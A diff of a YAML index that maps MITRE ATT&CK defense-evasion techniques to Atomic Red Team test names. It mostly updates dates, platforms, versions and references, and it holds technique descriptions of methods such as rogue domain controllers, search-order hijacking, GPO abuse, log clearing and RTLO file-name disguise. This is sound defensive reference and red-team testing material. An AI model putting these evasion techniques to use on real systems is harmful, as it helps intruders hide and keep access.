         Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -9778,8 +9918,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1207
     atomic_tests:
     - name: DCShadow (Active Directory)
@@ -9963,7 +10101,7 @@ defense-evasion:
         Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
         vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
         Driver Loader)"
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:03.480Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: Code Signing Policy Modification'
       x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -9987,7 +10125,6 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.006
     atomic_tests:
     - name: Code Signing Policy Modification
@@ -10003,7 +10140,7 @@ defense-evasion:
         elevation_required: true
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -10082,7 +10219,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1112:
@@ -10167,7 +10303,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1112
     atomic_tests:
     - name: Modify Registry of Current User Profile - cmd
@@ -11904,7 +12039,7 @@ defense-evasion:
         elevation_required: true
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -11923,6 +12058,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -11930,7 +12066,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -11950,29 +12085,31 @@ defense-evasion:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests:
     - name: powerShell Persistence via hijacking default modules - Get-Variable.exe
@@ -12039,7 +12176,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.001:
     technique:
@@ -12106,12 +12242,11 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1027.001
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -12147,6 +12282,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -12158,16 +12297,12 @@ defense-evasion:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -12203,12 +12338,12 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -12216,9 +12351,8 @@ defense-evasion:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests:
     - name: LockBit Black - Modify Group policy settings -cmd
@@ -12274,7 +12408,7 @@ defense-evasion:
         elevation_required: true
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -12289,6 +12423,7 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -12297,18 +12432,18 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -12340,9 +12475,6 @@ defense-evasion:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests:
     - name: Enable Guest account with RDP capability and admin privileges
@@ -12414,7 +12546,7 @@ defense-evasion:
         elevation_required: true
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -12535,7 +12667,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1070.001:
@@ -12609,7 +12740,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.001
     atomic_tests:
     - name: Clear Logs
@@ -12678,7 +12808,7 @@ defense-evasion:
         elevation_required: true
   T1222:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T17:54:06.038Z'
       name: File and Directory Permissions Modification
       description: "Adversaries may modify file or directory permissions/attributes
         to evade access control lists (ACLs) and access protected files.(Citation:
@@ -12775,7 +12905,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222
     atomic_tests:
     - name: Enable Local and Remote Symbolic Links via fsutil
@@ -12828,7 +12957,7 @@ defense-evasion:
         elevation_required: true
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -12860,11 +12989,10 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -12905,11 +13033,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -12965,7 +13092,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests:
     - name: Access Token Manipulation
@@ -12999,7 +13125,7 @@ defense-evasion:
         name: powershell
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -13056,7 +13182,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1218.008:
@@ -13092,7 +13217,7 @@ defense-evasion:
         description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
           20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
           Against Russian Banks. Retrieved March 7, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:52:49.877Z'
       name: 'Signed Binary Proxy Execution: Odbcconf'
       description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
         payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -13125,8 +13250,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.008
     atomic_tests:
     - name: Odbcconf.exe - Execute Arbitrary DLL
@@ -13192,7 +13315,7 @@ defense-evasion:
         name: command_prompt
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -13254,10 +13377,9 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -13315,7 +13437,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -13357,7 +13478,7 @@ defense-evasion:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -13416,41 +13537,10 @@ defense-evasion:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1578.003:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
-      type: attack-pattern
-      created: '2020-06-16T17:23:06.508Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.003
-        url: https://attack.mitre.org/techniques/T1578/003
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.415Z'
       name: Delete Cloud Instance
       description: |-
         An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -13459,20 +13549,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the deletion of an instance in the <code>TerminateInstances</code> event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances delete</code> to delete a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Metadata'
       - 'Instance: Instance Deletion'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+      created: '2020-06-16T17:23:06.508Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/003
+        external_id: T1578.003
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574.005:
     technique:
@@ -13502,7 +13622,7 @@ defense-evasion:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -13537,8 +13657,6 @@ defense-evasion:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1562.006:
     technique:
@@ -13629,7 +13747,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.006
     atomic_tests:
     - name: Disable Powershell ETW Provider - Windows
@@ -13733,7 +13850,7 @@ defense-evasion:
         elevation_required: true
   T1562.007:
     technique:
-      modified: '2023-04-15T00:25:36.502Z'
+      modified: '2024-10-16T19:38:57.374Z'
       name: Disable or Modify Cloud Firewall
       description: "Adversaries may disable or modify a firewall within a cloud environment
         to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -13741,19 +13858,25 @@ defense-evasion:
         Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
         typically utilize restrictive security groups and firewall rules that only
         allow network activity from trusted IP addresses via expected ports and protocols.
-        An adversary may introduce new firewall rules or policies to allow access
-        into a victim cloud environment. For example, an adversary may use a script
-        or utility that creates new ingress rules in existing security groups to allow
-        any TCP/IP connectivity, or remove networking limitations to support traffic
-        associated with malicious activity (such as cryptomining).(Citation: Expel
-        IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
-        2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
-        lateral movement, and/or data exfiltration that would otherwise not be allowed."
+        An adversary with appropriate permissions may introduce new firewall rules
+        or policies to allow access into a victim cloud environment and/or move laterally
+        from the cloud control plane to the data plane. For example, an adversary
+        may use a script or utility that creates new ingress rules in existing security
+        groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+        to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+        Compute Credentials 2022) They may also remove networking limitations to support
+        traffic associated with malicious activity (such as cryptomining).(Citation:
+        Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+        Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+        C2 communications, lateral movement, and/or data exfiltration that would otherwise
+        not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+        or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
       - Expel
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor cloud logs for modification or creation of new security
         groups or firewall rules.
@@ -13762,7 +13885,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Firewall: Firewall Disable'
       - 'Firewall: Firewall Rule Modification'
@@ -13785,9 +13908,8 @@ defense-evasion:
         url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.002:
     technique:
@@ -13820,7 +13942,7 @@ defense-evasion:
         description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
           - Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
           Retrieved April 22, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:01:59.733Z'
       name: Right-to-Left Override
       description: |-
         Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)
@@ -13839,8 +13961,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.002:
     technique:
@@ -13871,7 +13991,7 @@ defense-evasion:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -13901,12 +14021,10 @@ defense-evasion:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:59:22.125Z'
       name: Indicator Removal on Host
       description: |-
         Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -13932,9 +14050,8 @@ defense-evasion:
       - Windows
       - Containers
       - Network
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
